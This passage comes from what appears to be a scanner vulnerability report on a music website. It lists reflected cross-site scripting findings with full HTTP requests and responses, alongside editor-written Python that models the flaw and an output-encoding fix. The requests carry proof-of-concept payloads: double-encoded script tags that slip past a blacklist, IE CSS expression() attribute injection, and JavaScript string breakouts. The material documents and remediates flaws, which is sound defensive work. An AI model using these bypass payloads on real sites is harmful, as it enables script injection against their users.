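# Inputs copied from the report's request lines. The first is the same payload
# single-encoded, which the report says the application blocks.
SINGLE_ENCODED = ("/album4fd5c%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e4ad0e09dbc1"
                  "/uriah-heep/the-collection91")
DOUBLE_ENCODED = ("/album4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1"
                  "/uriah-heep/the-collection91")
STYLE_PAYLOAD = ('/album/uriah-heep/the-collection91'
                 '?h=624650163a909e"style="x:expression(alert(1))"8131f1c8632')

TEMPLATE = '<input type="hidden" name="parentUrl" value="http://bigpondmusic.com{}" />'


def webserver_decode(raw_target: str) -> str:
    """The web server percent-decodes the request target once before the
    application sees it (the decode the remediation text refers to)."""
    return unquote(raw_target)


def path_passes_filter(target: str) -> bool:
    """Assumed validation: a blacklist applied to the path only."""
    path, _, _query = target.partition("?")
    return not (BLOCKED & set(path))


def vulnerable_parent_url(raw_target: str):
    """Observed behaviour: validate the once-decoded value, decode it a second
    time, then splice it into a double-quoted attribute with no output
    encoding. Returns None when the filter rejects the request."""
    once = webserver_decode(raw_target)
    if not path_passes_filter(once):
        return None
    twice = unquote(once)          # the redundant second decode is the bug
    return TEMPLATE.format(twice)


def hardened_parent_url(raw_target: str) -> str:
    """Proposed fix: no second decode, and attribute-context encoding at the
    output point. escape(quote=True) turns " into &quot; and < into &lt;, so
    the value can neither close the attribute nor start a tag, whatever the
    filter did or did not catch."""
    once = webserver_decode(raw_target)
    return TEMPLATE.format(escape(once, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_markup(rendered: str) -> dict:
    """Parse the rendered fragment the way a browser would and report whether
    attacker text escaped the value attribute: any element other than the
    <input>, or any attribute on it beyond type/name/value, means breakout."""
    parser = _TagCollector()
    parser.feed(rendered)
    input_attrs = next(a for t, a in parser.tags if t == "input")
    return {
        "extra_tags": [t for t, _ in parser.tags if t != "input"],
        "extra_attrs": sorted(set(input_attrs) - {"type", "name", "value"}),
    }


if __name__ == "__main__":
    for label, target in (("single-encoded", SINGLE_ENCODED),
                          ("double-encoded", DOUBLE_ENCODED),
                          ("style payload", STYLE_PAYLOAD)):
        v = vulnerable_parent_url(target)
        print(label, "-> blocked" if v is None else injected_markup(v))
        print(label, "hardened ->", injected_markup(hardened_parent_url(target)))
```

Running the model, the single-encoded probe is rejected, the double-encoded one passes the blacklist as harmless `%22%3e...` text and only becomes `"><script>` after the application's own second decode, and the query-string payload never meets the filter at all. The hardened renderer deliberately keeps no blacklist: attribute-context encoding is the control, and once `"` is emitted as `&quot;` the Internet Explorer `expression()` trick has nothing to attach to. If the validation is retained, it must run on the fully canonicalised value (here `once`, since there is no longer a second decode), which is what the remediation text means by validating after canonicalisation. `injected_markup` is the check to keep in a regression test: it parses the fragment and flags any extra tag or attribute.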

2.149. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8ad'%3b2757a09f366 was submitted in the REST URL parameter 1. This input was echoed as 1b8ad';2757a09f366 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1b8ad'%3b2757a09f366/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1b8ad';2757a09f366';
   s.prop4 = 'uriah-heep';
   s.prop5 = 'the-collection91';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...
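The script-context reflection above (the `s.channel` assignment in the analytics block), as an added example. This is the editor's Python, not code from bigpondmusic.com: the template line and the probe are copied from the response and request above, the encoder is the fix this editor proposes, and the `</script>` input exists only to exercise the encoder, not as a payload observed on the site. The scanner found no full proof of concept here and this example claims none; it shows only that the probe closes the string literal and what output encoding prevents that.

```python
# Added example (editor's model, not bigpondmusic.com code): reproduces the
# script-context reflection behind findings 2.149/2.152/2.156/2.160 and shows
# how to emit the value as a JavaScript string literal that cannot be closed.
import json
import re
from urllib.parse import unquote

# The scanner's probe, copied from the report's request line.
PROBE = "album1b8ad'%3b2757a09f366"
# Constructed only to exercise the encoder; not a payload observed on the site.
SCRIPT_CLOSER = "x%3c/script%3e%3cb%3e"


def vulnerable_channel_line(segment: str) -> str:
    """As observed: the decoded first path segment is dropped into a
    single-quoted JavaScript string literal with no escaping."""
    return f"   s.channel = '{unquote(segment)}';"


def js_string_literal(value: str) -> str:
    """JSON-encode the value (handles backslash, double quote, control
    characters and, with ensure_ascii, U+2028/U+2029), then \\u-escape the
    characters that matter inside a <script> element so the literal can close
    neither the string nor the script block."""
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"),
                    ("&", "\\u0026"), ("'", "\\u0027")):
        encoded = encoded.replace(ch, esc)
    return encoded


def hardened_channel_line(segment: str) -> str:
    """Proposed fix for the same template line."""
    return f"   s.channel = {js_string_literal(unquote(segment))};"


# The right-hand side must be exactly one well-formed JS string literal and
# nothing else; any trailing code means attacker text is being executed
# rather than stored as data.
_ONE_LITERAL = re.compile(
    r"""s\.channel\s*=\s*(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")\s*;$"""
)


def assignment_is_single_literal(line: str) -> bool:
    """Lexer-style regression check for the rendered line."""
    return _ONE_LITERAL.match(line.strip()) is not None


if __name__ == "__main__":
    for segment in (PROBE, SCRIPT_CLOSER):
        for render in (vulnerable_channel_line, hardened_channel_line):
            line = render(segment)
            print(assignment_is_single_literal(line), line)
```

With the probe, the vulnerable template yields exactly the `s.channel = 'album1b8ad';2757a09f366';` line seen in the response, and the check reports that the assignment is no longer a single literal. The encoder emits a double-quoted literal because that is what `json.dumps` produces, so the site's single-quoted template would have to change with it; escaping `'` as `\u0027` as well makes the output safe in either quoting style. The `<`, `>` and `&` escapes matter because the HTML parser, not the JavaScript engine, decides where a `<script>` element ends: without them a value containing `</script>` terminates the block regardless of how well the string literal is quoted.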

2.150. http://bigpondmusic.com/album/uriah-heep/the-collection91 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 was submitted in the h parameter. This input was echoed as a909e"style="x:expression(alert(1))"8131f1c8632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/uriah-heep/the-collection91?h=624650163a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?h=624650163a909e"style="x:expression(alert(1))"8131f1c8632" />
...[SNIP]...

2.151. http://bigpondmusic.com/album/uriah-heep/the-collection91 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc95e"style="x:expression(alert(1))"7a852546fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/uriah-heep/the-collection91?bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?bc95e"style="x:expression(alert(1))"7a852546fd8=1" />
...[SNIP]...

2.152. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1289'%3be26bc6beb3c was submitted in the REST URL parameter 1. This input was echoed as a1289';e26bc6beb3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albuma1289'%3be26bc6beb3c/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albuma1289';e26bc6beb3c';
   s.prop4 = 'various-artists';
   s.prop5 = 'he-will-have-his-way-the-songs-of-tim-neil-finn';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1=
...[SNIP]...

2.153. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902 was submitted in the REST URL parameter 1. This input was echoed as 1bc4c"><script>alert(1)</script>852e427d902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album1bc4c"><script>alert(1)</script>852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn" />
...[SNIP]...

2.154. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe325"style="x:expression(alert(1))"c690ff87c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 132595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - He Will Ha
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style="x:expression(alert(1))"c690ff87c07=1" />
...[SNIP]...

2.155. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [CID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 was submitted in the CID parameter. This input was echoed as f8b5a"style="x:expression(alert(1))"bce27fd6229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style="x:expression(alert(1))"bce27fd6229" />
...[SNIP]...

2.156. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad01'%3be08d6c44f91 was submitted in the REST URL parameter 1. This input was echoed as 7ad01';e08d6c44f91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7ad01'%3be08d6c44f91/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88263


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7ad01';e08d6c44f91';
   s.prop4 = 'various-artists';
   s.prop5 = 'so-fresh-the-hits-of-summer-2011-the-best-of-2010';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier
...[SNIP]...

2.157. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4 was submitted in the REST URL parameter 1. This input was echoed as 754d1"><script>alert(1)</script>4db73f5a8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88092


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album754d1"><script>alert(1)</script>4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010" />
...[SNIP]...

2.158. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bfcd"style="x:expression(alert(1))"22a4ca4833e in the application's response.

